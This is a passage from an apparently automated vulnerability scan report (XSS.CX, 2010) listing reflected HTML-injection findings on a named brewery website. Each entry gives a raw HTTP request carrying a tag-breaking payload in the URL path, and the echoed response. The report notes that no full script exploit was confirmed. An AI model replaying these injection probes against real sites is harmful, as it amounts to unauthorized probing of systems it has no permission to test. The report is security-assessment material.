<body id="process8ec8c"><a>3f99d872435_page" class="process8ec8c">
...[SNIP]...

1.218. http://www.ninkasibrewing.com/tasting_room/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /tasting_room/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 382ed"><a>c4b55899033 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tasting_room382ed"><a>c4b55899033/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:45:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13224

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="tasting_room382ed"><a>c4b55899033_page" class="tasting_room382ed">
...[SNIP]...

1.219. http://www.ninkasibrewing.com/tasting_room/content/css/basic.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /tasting_room/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e70ae"><a>5db925a41c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tasting_roome70ae"><a>5db925a41c/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:54:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="tasting_roome70ae"><a>5db925a41c_page" class="tasting_roome70ae">
...[SNIP]...

1.220. http://www.ninkasibrewing.com/tasting_room/content/css/ninkasi.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /tasting_room/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a066"><a>6e1291e293b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tasting_room8a066"><a>6e1291e293b/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:54:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13224

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="tasting_room8a066"><a>6e1291e293b_page" class="tasting_room8a066">
...[SNIP]...

1.221. http://www.ninkasibrewing.com/tasting_room/content/css/print.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /tasting_room/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a74a"><a>886f2be4379 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tasting_room7a74a"><a>886f2be4379/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:54:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13224

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="tasting_room7a74a"><a>886f2be4379_page" class="tasting_room7a74a">
...[SNIP]...

1.222. http://www.ninkasibrewing.com/tasting_room/content/js/basic.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /tasting_room/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b45d"><a>58a95621c51 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tasting_room2b45d"><a>58a95621c51/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:54:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13224

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="tasting_room2b45d"><a>58a95621c51_page" class="tasting_room2b45d">
...[SNIP]...

1.223. http://www.ninkasibrewing.com/tasting_room/content/js/combined.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /tasting_room/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63aa8"><a>d20e97deba5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tasting_room63aa8"><a>d20e97deba5/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:54:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13224

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="tasting_room63aa8"><a>d20e97deba5_page" class="tasting_room63aa8">
...[SNIP]...

1.224. http://www.ninkasibrewing.com/tasting_room/content/js/combined.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /tasting_room/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 229d9"><a>4dc96b2a07e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tasting_room229d9"><a>4dc96b2a07e/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:54:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13224

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="tasting_room229d9"><a>4dc96b2a07e_page" class="tasting_room229d9">
...[SNIP]...

1.225. http://www.ninkasibrewing.com/twitter/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /twitter/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9914"><a>7fd5a5d0d72 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /twitterd9914"><a>7fd5a5d0d72/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:45:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="twitterd9914"><a>7fd5a5d0d72_page" class="twitterd9914">
...[SNIP]...

1.226. http://www.ninkasibrewing.com/twitter/content/css/basic.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /twitter/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb286"><a>ad9894bb919 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /twittereb286"><a>ad9894bb919/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:54:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="twittereb286"><a>ad9894bb919_page" class="twittereb286">
...[SNIP]...

1.227. http://www.ninkasibrewing.com/twitter/content/css/ninkasi.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /twitter/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f89ac"><a>3fe204e99a2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /twitterf89ac"><a>3fe204e99a2/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:54:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="twitterf89ac"><a>3fe204e99a2_page" class="twitterf89ac">
...[SNIP]...

1.228. http://www.ninkasibrewing.com/twitter/content/css/print.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /twitter/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe021"><a>ac6878c8598 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /twitterfe021"><a>ac6878c8598/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:54:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="twitterfe021"><a>ac6878c8598_page" class="twitterfe021">
...[SNIP]...

1.229. http://www.ninkasibrewing.com/twitter/content/js/basic.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /twitter/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b875"><a>10326ad19f9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /twitter5b875"><a>10326ad19f9/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:54:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="twitter5b875"><a>10326ad19f9_page" class="twitter5b875">
...[SNIP]...

1.230. http://www.ninkasibrewing.com/twitter/content/js/combined.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /twitter/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f23d0"><a>4971b5e26ce was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /twitterf23d0"><a>4971b5e26ce/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:54:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="twitterf23d0"><a>4971b5e26ce_page" class="twitterf23d0">
...[SNIP]...

1.231. http://www.ninkasibrewing.com/twitter/content/js/combined.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /twitter/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb490"><a>66876d9e15c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /twitterfb490"><a>66876d9e15c/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:54:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="twitterfb490"><a>66876d9e15c_page" class="twitterfb490">
...[SNIP]...

Report generated by XSS.CX at Sun Nov 21 16:51:53 CST 2010.